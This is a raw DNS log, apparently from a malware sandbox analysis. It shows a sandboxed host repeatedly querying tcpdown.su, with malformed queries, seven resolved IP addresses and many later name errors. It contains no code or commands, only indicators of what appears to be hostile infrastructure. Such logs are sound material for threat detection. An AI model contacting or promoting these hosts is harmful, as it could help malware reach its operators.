          Jan 1, 2025 15:07:21.450057983 CET192.168.2.138.8.8.80x4e04Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:21.457791090 CET192.168.2.138.8.8.80x4e04Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:21.465527058 CET192.168.2.138.8.8.80x4e04Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:21.474061012 CET192.168.2.138.8.8.80x1feaStandard query (0)tcpdown.suo. [malformed]256281false
          Jan 1, 2025 15:07:21.481179953 CET192.168.2.138.8.8.80x1feaStandard query (0)tcpdown.suo. [malformed]256281false
          Jan 1, 2025 15:07:21.487962008 CET192.168.2.138.8.8.80x1feaStandard query (0)tcpdown.suo. [malformed]256281false
          Jan 1, 2025 15:07:21.495055914 CET192.168.2.138.8.8.80x1feaStandard query (0)tcpdown.suo. [malformed]256281false
          Jan 1, 2025 15:07:21.502033949 CET192.168.2.138.8.8.80x1feaStandard query (0)tcpdown.suo. [malformed]256281false
          Jan 1, 2025 15:07:23.046040058 CET192.168.2.138.8.8.80xf438Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:23.054008961 CET192.168.2.138.8.8.80xf438Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:23.061805010 CET192.168.2.138.8.8.80xf438Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:23.069772959 CET192.168.2.138.8.8.80xf438Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:23.077857018 CET192.168.2.138.8.8.80xf438Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:23.085422039 CET192.168.2.138.8.8.80xfb62Standard query (0)tcpdown.suo. [malformed]256283false
          Jan 1, 2025 15:07:23.092343092 CET192.168.2.138.8.8.80xfb62Standard query (0)tcpdown.suo. [malformed]256283false
          Jan 1, 2025 15:07:23.099209070 CET192.168.2.138.8.8.80xfb62Standard query (0)tcpdown.suo. [malformed]256283false
          Jan 1, 2025 15:07:23.106152058 CET192.168.2.138.8.8.80xfb62Standard query (0)tcpdown.suo. [malformed]256283false
          Jan 1, 2025 15:07:23.113115072 CET192.168.2.138.8.8.80xfb62Standard query (0)tcpdown.suo. [malformed]256283false
          Jan 1, 2025 15:07:24.688576937 CET192.168.2.138.8.8.80xe204Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:24.696527958 CET192.168.2.138.8.8.80xe204Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:24.704453945 CET192.168.2.138.8.8.80xe204Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:24.712219000 CET192.168.2.138.8.8.80xe204Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:24.720345974 CET192.168.2.138.8.8.80xe204Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:24.728022099 CET192.168.2.138.8.8.80xdc45Standard query (0)tcpdown.suo. [malformed]256284false
          Jan 1, 2025 15:07:24.736263990 CET192.168.2.138.8.8.80xdc45Standard query (0)tcpdown.suo. [malformed]256284false
          Jan 1, 2025 15:07:24.743267059 CET192.168.2.138.8.8.80xdc45Standard query (0)tcpdown.suo. [malformed]256284false
          Jan 1, 2025 15:07:24.750628948 CET192.168.2.138.8.8.80xdc45Standard query (0)tcpdown.suo. [malformed]256284false
          Jan 1, 2025 15:07:24.757697105 CET192.168.2.138.8.8.80xdc45Standard query (0)tcpdown.suo. [malformed]256284false
          Jan 1, 2025 15:07:26.368468046 CET192.168.2.138.8.8.80x3a68Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:26.377245903 CET192.168.2.138.8.8.80x3a68Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:26.385137081 CET192.168.2.138.8.8.80x3a68Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:26.393403053 CET192.168.2.138.8.8.80x3a68Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:26.401738882 CET192.168.2.138.8.8.80x3a68Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:26.409400940 CET192.168.2.138.8.8.80x35b5Standard query (0)tcpdown.suo. [malformed]256286false
          Jan 1, 2025 15:07:26.417102098 CET192.168.2.138.8.8.80x35b5Standard query (0)tcpdown.suo. [malformed]256286false
          Jan 1, 2025 15:07:26.431391001 CET192.168.2.138.8.8.80x35b5Standard query (0)tcpdown.suo. [malformed]256286false
          Jan 1, 2025 15:07:26.439554930 CET192.168.2.138.8.8.80x35b5Standard query (0)tcpdown.suo. [malformed]256286false
          Jan 1, 2025 15:07:26.446691990 CET192.168.2.138.8.8.80x35b5Standard query (0)tcpdown.suo. [malformed]256286false
          Jan 1, 2025 15:07:27.987689972 CET192.168.2.138.8.8.80xdcd2Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:27.995989084 CET192.168.2.138.8.8.80xdcd2Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:28.003757954 CET192.168.2.138.8.8.80xdcd2Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:28.011892080 CET192.168.2.138.8.8.80xdcd2Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:28.019496918 CET192.168.2.138.8.8.80xdcd2Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:28.026868105 CET192.168.2.138.8.8.80x1afbStandard query (0)tcpdown.suo. [malformed]256288false
          Jan 1, 2025 15:07:28.033873081 CET192.168.2.138.8.8.80x1afbStandard query (0)tcpdown.suo. [malformed]256288false
          Jan 1, 2025 15:07:28.040709019 CET192.168.2.138.8.8.80x1afbStandard query (0)tcpdown.suo. [malformed]256288false
          Jan 1, 2025 15:07:28.047749996 CET192.168.2.138.8.8.80x1afbStandard query (0)tcpdown.suo. [malformed]256288false
          Jan 1, 2025 15:07:28.054544926 CET192.168.2.138.8.8.80x1afbStandard query (0)tcpdown.suo. [malformed]256288false
          Jan 1, 2025 15:07:29.606349945 CET192.168.2.138.8.8.80x414Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:29.614006042 CET192.168.2.138.8.8.80x414Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:29.621367931 CET192.168.2.138.8.8.80x414Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:29.631804943 CET192.168.2.138.8.8.80x414Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:29.640038967 CET192.168.2.138.8.8.80x414Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:29.648781061 CET192.168.2.138.8.8.80xf8f2Standard query (0)tcpdown.suo. [malformed]256289false
          Jan 1, 2025 15:07:29.655962944 CET192.168.2.138.8.8.80xf8f2Standard query (0)tcpdown.suo. [malformed]256289false
          Jan 1, 2025 15:07:29.662986040 CET192.168.2.138.8.8.80xf8f2Standard query (0)tcpdown.suo. [malformed]256289false
          Jan 1, 2025 15:07:29.669864893 CET192.168.2.138.8.8.80xf8f2Standard query (0)tcpdown.suo. [malformed]256289false
          Jan 1, 2025 15:07:29.676677942 CET192.168.2.138.8.8.80xf8f2Standard query (0)tcpdown.suo. [malformed]256289false
          Jan 1, 2025 15:07:31.216545105 CET192.168.2.138.8.8.80x8f2fStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:31.224227905 CET192.168.2.138.8.8.80x8f2fStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:31.232325077 CET192.168.2.138.8.8.80x8f2fStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:31.240138054 CET192.168.2.138.8.8.80x8f2fStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:31.247698069 CET192.168.2.138.8.8.80x8f2fStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:31.256643057 CET192.168.2.138.8.8.80x1c02Standard query (0)tcpdown.suo. [malformed]256291false
          Jan 1, 2025 15:07:31.263602972 CET192.168.2.138.8.8.80x1c02Standard query (0)tcpdown.suo. [malformed]256291false
          Jan 1, 2025 15:07:31.270608902 CET192.168.2.138.8.8.80x1c02Standard query (0)tcpdown.suo. [malformed]256291false
          Jan 1, 2025 15:07:31.277659893 CET192.168.2.138.8.8.80x1c02Standard query (0)tcpdown.suo. [malformed]256291false
          Jan 1, 2025 15:07:31.284590960 CET192.168.2.138.8.8.80x1c02Standard query (0)tcpdown.suo. [malformed]256291false
          Jan 1, 2025 15:07:32.893280029 CET192.168.2.138.8.8.80x589dStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:32.900969028 CET192.168.2.138.8.8.80x589dStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:32.908977985 CET192.168.2.138.8.8.80x589dStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:32.916754007 CET192.168.2.138.8.8.80x589dStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:32.924335003 CET192.168.2.138.8.8.80x589dStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:32.931863070 CET192.168.2.138.8.8.80x1978Standard query (0)tcpdown.suo. [malformed]256292false
          Jan 1, 2025 15:07:32.939281940 CET192.168.2.138.8.8.80x1978Standard query (0)tcpdown.suo. [malformed]256292false
          Jan 1, 2025 15:07:32.946264029 CET192.168.2.138.8.8.80x1978Standard query (0)tcpdown.suo. [malformed]256292false
          Jan 1, 2025 15:07:32.953298092 CET192.168.2.138.8.8.80x1978Standard query (0)tcpdown.suo. [malformed]256292false
          Jan 1, 2025 15:07:32.960357904 CET192.168.2.138.8.8.80x1978Standard query (0)tcpdown.suo. [malformed]256292false
          Jan 1, 2025 15:07:34.541987896 CET192.168.2.138.8.8.80xb7a2Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:34.550014019 CET192.168.2.138.8.8.80xb7a2Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:34.557986021 CET192.168.2.138.8.8.80xb7a2Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:34.565890074 CET192.168.2.138.8.8.80xb7a2Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:34.573685884 CET192.168.2.138.8.8.80xb7a2Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:34.584029913 CET192.168.2.138.8.8.80xe485Standard query (0)tcpdown.suo. [malformed]256294false
          Jan 1, 2025 15:07:34.591622114 CET192.168.2.138.8.8.80xe485Standard query (0)tcpdown.suo. [malformed]256294false
          Jan 1, 2025 15:07:34.598958969 CET192.168.2.138.8.8.80xe485Standard query (0)tcpdown.suo. [malformed]256294false
          Jan 1, 2025 15:07:34.606142998 CET192.168.2.138.8.8.80xe485Standard query (0)tcpdown.suo. [malformed]256294false
          Jan 1, 2025 15:07:34.613291979 CET192.168.2.138.8.8.80xe485Standard query (0)tcpdown.suo. [malformed]256294false
          Jan 1, 2025 15:07:36.192301989 CET192.168.2.138.8.8.80x5739Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:36.200335026 CET192.168.2.138.8.8.80x5739Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:36.207921982 CET192.168.2.138.8.8.80x5739Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:36.215683937 CET192.168.2.138.8.8.80x5739Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:36.223138094 CET192.168.2.138.8.8.80x5739Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:36.231398106 CET192.168.2.138.8.8.80x24d1Standard query (0)tcpdown.suo. [malformed]256296false
          Jan 1, 2025 15:07:36.238517046 CET192.168.2.138.8.8.80x24d1Standard query (0)tcpdown.suo. [malformed]256296false
          Jan 1, 2025 15:07:36.245646000 CET192.168.2.138.8.8.80x24d1Standard query (0)tcpdown.suo. [malformed]256296false
          Jan 1, 2025 15:07:36.253899097 CET192.168.2.138.8.8.80x24d1Standard query (0)tcpdown.suo. [malformed]256296false
          Jan 1, 2025 15:07:36.266170979 CET192.168.2.138.8.8.80x24d1Standard query (0)tcpdown.suo. [malformed]256296false
          Jan 1, 2025 15:07:38.110368967 CET192.168.2.138.8.8.80x7ae5Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:38.118410110 CET192.168.2.138.8.8.80x7ae5Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:38.126177073 CET192.168.2.138.8.8.80x7ae5Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:38.134037971 CET192.168.2.138.8.8.80x7ae5Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:38.143394947 CET192.168.2.138.8.8.80x7ae5Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:38.151170015 CET192.168.2.138.8.8.80xfaf1Standard query (0)tcpdown.suo. [malformed]256298false
          Jan 1, 2025 15:07:38.158338070 CET192.168.2.138.8.8.80xfaf1Standard query (0)tcpdown.suo. [malformed]256298false
          Jan 1, 2025 15:07:38.165307045 CET192.168.2.138.8.8.80xfaf1Standard query (0)tcpdown.suo. [malformed]256298false
          Jan 1, 2025 15:07:38.172260046 CET192.168.2.138.8.8.80xfaf1Standard query (0)tcpdown.suo. [malformed]256298false
          Jan 1, 2025 15:07:38.179258108 CET192.168.2.138.8.8.80xfaf1Standard query (0)tcpdown.suo. [malformed]256298false
          Jan 1, 2025 15:07:39.739016056 CET192.168.2.138.8.8.80x7c91Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:39.747071981 CET192.168.2.138.8.8.80x7c91Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:39.754726887 CET192.168.2.138.8.8.80x7c91Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:39.762734890 CET192.168.2.138.8.8.80x7c91Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:39.770478964 CET192.168.2.138.8.8.80x7c91Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:39.778321028 CET192.168.2.138.8.8.80xdf8fStandard query (0)tcpdown.suo. [malformed]256299false
          Jan 1, 2025 15:07:39.785753965 CET192.168.2.138.8.8.80xdf8fStandard query (0)tcpdown.suo. [malformed]256299false
          Jan 1, 2025 15:07:39.793178082 CET192.168.2.138.8.8.80xdf8fStandard query (0)tcpdown.suo. [malformed]256299false
          Jan 1, 2025 15:07:39.800559044 CET192.168.2.138.8.8.80xdf8fStandard query (0)tcpdown.suo. [malformed]256299false
          Jan 1, 2025 15:07:39.807900906 CET192.168.2.138.8.8.80xdf8fStandard query (0)tcpdown.suo. [malformed]256299false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Jan 1, 2025 15:06:44.641360044 CET8.8.8.8192.168.2.130xf887No error (0)tcpdown.su45.200.149.95A (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:44.641360044 CET8.8.8.8192.168.2.130xf887No error (0)tcpdown.su23.94.37.42A (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:44.641360044 CET8.8.8.8192.168.2.130xf887No error (0)tcpdown.su23.94.242.130A (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:44.641360044 CET8.8.8.8192.168.2.130xf887No error (0)tcpdown.su45.200.149.96A (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:44.641360044 CET8.8.8.8192.168.2.130xf887No error (0)tcpdown.su45.200.149.167A (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:44.641360044 CET8.8.8.8192.168.2.130xf887No error (0)tcpdown.su104.168.33.8A (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:44.641360044 CET8.8.8.8192.168.2.130xf887No error (0)tcpdown.su45.200.149.249A (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:44.666802883 CET8.8.8.8192.168.2.130xe7f3Name error (3)tcpdown.su|!nonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:44.676784992 CET8.8.8.8192.168.2.130xe7f3Name error (3)tcpdown.su|!nonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:44.690454960 CET8.8.8.8192.168.2.130xe7f3Name error (3)tcpdown.su|!nonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:44.704016924 CET8.8.8.8192.168.2.130xe7f3Name error (3)tcpdown.su|!nonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:44.713038921 CET8.8.8.8192.168.2.130xe7f3Name error (3)tcpdown.su|!nonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:46.314976931 CET8.8.8.8192.168.2.130xb137Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:46.330627918 CET8.8.8.8192.168.2.130xb137Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:46.342125893 CET8.8.8.8192.168.2.130xb137Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:46.356899977 CET8.8.8.8192.168.2.130xb137Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:46.368221045 CET8.8.8.8192.168.2.130xb137Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:48.101458073 CET8.8.8.8192.168.2.130x4811Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:48.112611055 CET8.8.8.8192.168.2.130x4811Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:48.123116970 CET8.8.8.8192.168.2.130x4811Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:48.132533073 CET8.8.8.8192.168.2.130x4811Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:48.143053055 CET8.8.8.8192.168.2.130x4811Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:49.864219904 CET8.8.8.8192.168.2.130x3da3Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:49.872778893 CET8.8.8.8192.168.2.130x3da3Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:49.890276909 CET8.8.8.8192.168.2.130x3da3Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:49.902112961 CET8.8.8.8192.168.2.130x3da3Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:49.911933899 CET8.8.8.8192.168.2.130x3da3Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:51.541825056 CET8.8.8.8192.168.2.130x320fName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:51.551512003 CET8.8.8.8192.168.2.130x320fName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:51.560789108 CET8.8.8.8192.168.2.130x320fName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:51.569972038 CET8.8.8.8192.168.2.130x320fName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:51.579924107 CET8.8.8.8192.168.2.130x320fName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:53.212322950 CET8.8.8.8192.168.2.130xc176Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:53.221086979 CET8.8.8.8192.168.2.130xc176Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:53.229844093 CET8.8.8.8192.168.2.130xc176Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:53.237914085 CET8.8.8.8192.168.2.130xc176Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:53.246798038 CET8.8.8.8192.168.2.130xc176Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:54.871474028 CET8.8.8.8192.168.2.130x85a1Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:54.879452944 CET8.8.8.8192.168.2.130x85a1Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:54.888330936 CET8.8.8.8192.168.2.130x85a1Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:54.897865057 CET8.8.8.8192.168.2.130x85a1Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:54.907577038 CET8.8.8.8192.168.2.130x85a1Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:56.539328098 CET8.8.8.8192.168.2.130x4b9bName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:56.549494028 CET8.8.8.8192.168.2.130x4b9bName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:56.557650089 CET8.8.8.8192.168.2.130x4b9bName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:56.571641922 CET8.8.8.8192.168.2.130x4b9bName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:56.579530001 CET8.8.8.8192.168.2.130x4b9bName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:58.204046965 CET8.8.8.8192.168.2.130xd655Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:58.215712070 CET8.8.8.8192.168.2.130xd655Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:58.228861094 CET8.8.8.8192.168.2.130xd655Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:58.241539955 CET8.8.8.8192.168.2.130xd655Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:58.253803968 CET8.8.8.8192.168.2.130xd655Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:59.902076960 CET8.8.8.8192.168.2.130x48d3Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:59.913619041 CET8.8.8.8192.168.2.130x48d3Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:59.925426960 CET8.8.8.8192.168.2.130x48d3Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:59.935590029 CET8.8.8.8192.168.2.130x48d3Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:59.948374987 CET8.8.8.8192.168.2.130x48d3Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:01.556751013 CET8.8.8.8192.168.2.130x1e69Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:01.565619946 CET8.8.8.8192.168.2.130x1e69Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:01.575567961 CET8.8.8.8192.168.2.130x1e69Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:01.583787918 CET8.8.8.8192.168.2.130x1e69Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:01.592133045 CET8.8.8.8192.168.2.130x1e69Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:03.359226942 CET8.8.8.8192.168.2.130x2786Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:03.367224932 CET8.8.8.8192.168.2.130x2786Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:03.374891043 CET8.8.8.8192.168.2.130x2786Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:03.383500099 CET8.8.8.8192.168.2.130x2786Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:03.391442060 CET8.8.8.8192.168.2.130x2786Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:04.983179092 CET8.8.8.8192.168.2.130xce89Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:04.990997076 CET8.8.8.8192.168.2.130xce89Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:04.998595953 CET8.8.8.8192.168.2.130xce89Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:05.006510973 CET8.8.8.8192.168.2.130xce89Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:05.014430046 CET8.8.8.8192.168.2.130xce89Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:06.610512972 CET8.8.8.8192.168.2.130x2db5Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:06.618565083 CET8.8.8.8192.168.2.130x2db5Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:06.633568048 CET8.8.8.8192.168.2.130x2db5Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:06.641392946 CET8.8.8.8192.168.2.130x2db5Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:06.649039984 CET8.8.8.8192.168.2.130x2db5Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:08.275441885 CET8.8.8.8192.168.2.130x2af0Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:08.283257961 CET8.8.8.8192.168.2.130x2af0Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:08.290899992 CET8.8.8.8192.168.2.130x2af0Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:08.299772024 CET8.8.8.8192.168.2.130x2af0Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:08.309087992 CET8.8.8.8192.168.2.130x2af0Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:09.944700956 CET8.8.8.8192.168.2.130x1aa1Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:09.959394932 CET8.8.8.8192.168.2.130x1aa1Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:09.967611074 CET8.8.8.8192.168.2.130x1aa1Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:09.976351976 CET8.8.8.8192.168.2.130x1aa1Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:09.989470959 CET8.8.8.8192.168.2.130x1aa1Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:11.615784883 CET8.8.8.8192.168.2.130x9a89Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:11.623531103 CET8.8.8.8192.168.2.130x9a89Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:11.631347895 CET8.8.8.8192.168.2.130x9a89Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:11.639502048 CET8.8.8.8192.168.2.130x9a89Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:11.647221088 CET8.8.8.8192.168.2.130x9a89Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:13.239728928 CET8.8.8.8192.168.2.130x45c7Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
